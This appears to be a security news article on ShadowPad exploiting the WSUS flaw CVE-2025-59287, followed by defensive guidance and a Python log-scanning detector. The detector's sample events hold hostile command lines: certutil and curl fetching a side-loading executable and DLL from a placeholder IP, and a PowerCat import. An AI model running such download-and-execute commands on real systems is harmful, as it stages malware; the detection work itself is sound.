Security researchers have confirmed that the ShadowPad malware is actively exploiting a recently patched vulnerability in Windows Server Update Services known as CVE-2025-59287, enabling attackers to gain full system-level access to targeted servers. The flaw is a critical deserialization defect that allows remote code execution on unpatched WSUS instances, giving intruders a direct foothold inside enterprise environments.
Once inside, attackers use the PowerCat PowerShell utility to establish a system shell and then deploy ShadowPad using standard Windows commands including certutil and curl. This enables them to bypass standard endpoint defenses. ShadowPad, widely associated with Chinese state-aligned threat groups, is considered one of the most advanced modular backdoors in active use today. In these intrusions, the malware relies on DLL side-loading, where a legitimate executable such as ETDCtrlHelper.exe loads a malicious DLL that launches ShadowPad in memory. This technique allows the malware to remain stealthy, load additional modules, harvest information and move laterally without leaving traces on disk.
What makes this attack particularly alarming is the abuse of WSUS, a Microsoft tool trusted by enterprises to distribute patches across entire server fleets. By compromising WSUS, attackers can piggyback on the very infrastructure that organisations rely on to secure their networks. This method mirrors the supply-chain compromises seen in large-scale incidents where attackers target one central point to reach thousands of connected systems. After proof-of-concept exploit code surfaced publicly, threat actors rapidly adopted the vulnerability and began deploying ShadowPad against unpatched WSUS servers worldwide.
Because WSUS is present in government agencies, financial institutions, manufacturers and large corporations, the potential reach of this campaign is significant. The flaw gives attackers not just initial access but systemic control of servers, allowing them to deploy espionage modules, credential theft tools or even ransomware operations.
Security teams must immediately verify whether their WSUS servers have applied the November patch addressing CVE-2025-59287. Any WSUS instance exposed to external networks should be considered high risk. Administrators should review logs for unexpected certutil or curl executions, inspect for signs of PowerCat abuse, and monitor for memory-based payloads loaded through DLL side-loading.
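As an added illustration of the log review described above (example code written for this page, not from the original article or any vendor tooling), the following Python scan runs over constructed process-creation events and flags certutil/curl downloads, PowerCat usage, and ETDCtrlHelper.exe executing from outside Program Files. The sample events, the addresses in them, and the trusted-path heuristic are assumptions made for the demonstration.

```python
import re
from typing import Dict, List

# Constructed process-creation events (Sysmon Event ID 1 style), flattened to
# "parent_image|image|command_line". These are invented sample lines for the
# demonstration, not telemetry from the reported intrusions.
SAMPLE_EVENTS = [
    "C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -nop -ep bypass -c Import-Module C:\\ProgramData\\powercat.ps1",
    "C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\certutil.exe|"
    "certutil.exe -urlcache -split -f http://203.0.113.5/ETDCtrlHelper.exe C:\\ProgramData\\ETDCtrlHelper.exe",
    "C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\curl.exe|"
    "curl.exe -o C:\\ProgramData\\ETDCtrl.dll http://203.0.113.5/ETDCtrl.dll",
    "C:\\Windows\\System32\\cmd.exe|C:\\ProgramData\\ETDCtrlHelper.exe|ETDCtrlHelper.exe",
    "C:\\Windows\\System32\\services.exe|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs",
    "C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\certutil.exe|certutil.exe -hashfile C:\\patch.msu SHA256",
]

# Each rule: (name, image basename it applies to, command-line regex or None for a path rule).
RULES = [
    ("certutil_download", "certutil.exe", re.compile(r"-urlcache\b.*\bhttps?://", re.I)),
    ("curl_download", "curl.exe", re.compile(r"\bhttps?://", re.I)),
    ("powercat_usage", "powershell.exe", re.compile(r"powercat", re.I)),
    # Assumption: the legitimate ETDCtrlHelper.exe lives under Program Files; a copy
    # running from anywhere else is a candidate DLL side-loading host.
    ("sideload_host_unusual_path", "etdctrlhelper.exe", None),
]
TRUSTED_PREFIXES = ("c:\\program files\\", "c:\\program files (x86)\\")

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def scan_events(events: List[str]) -> List[Dict[str, str]]:
    """Return one finding per event that matches a rule (first matching rule wins)."""
    findings = []
    for line in events:
        parent, image, cmdline = line.split("|", 2)
        for name, want_image, pattern in RULES:
            if basename(image) != want_image:
                continue
            if pattern is None:
                # Path rule: fire only when the host binary runs from an untrusted location.
                if image.lower().startswith(TRUSTED_PREFIXES):
                    continue
            elif not pattern.search(cmdline):
                continue
            findings.append({"rule": name, "parent": parent, "image": image, "cmdline": cmdline})
            break
    return findings

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['image']} <- {f['parent']}: {f['cmdline']}")
```

The benign certutil hash check and the svchost event produce no findings, which is the point of keying on URLs and untrusted paths rather than on the binary name alone.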
Further protections include restricting access to WSUS infrastructure, disabling unauthenticated interactions, isolating patch management servers using strict network segmentation and enabling behavior-based detection capable of identifying anomalous update system activity.
The ShadowPad campaign highlights an unmistakable shift in attacker priorities. Threat groups are no longer simply targeting endpoints or email users; they are turning trusted infrastructure itself into an attack surface. Software update channels once assumed safe are now prime targets. The message for defenders is clear: even the tools designed to protect an organisation may become the entry point for its compromise if not carefully secured.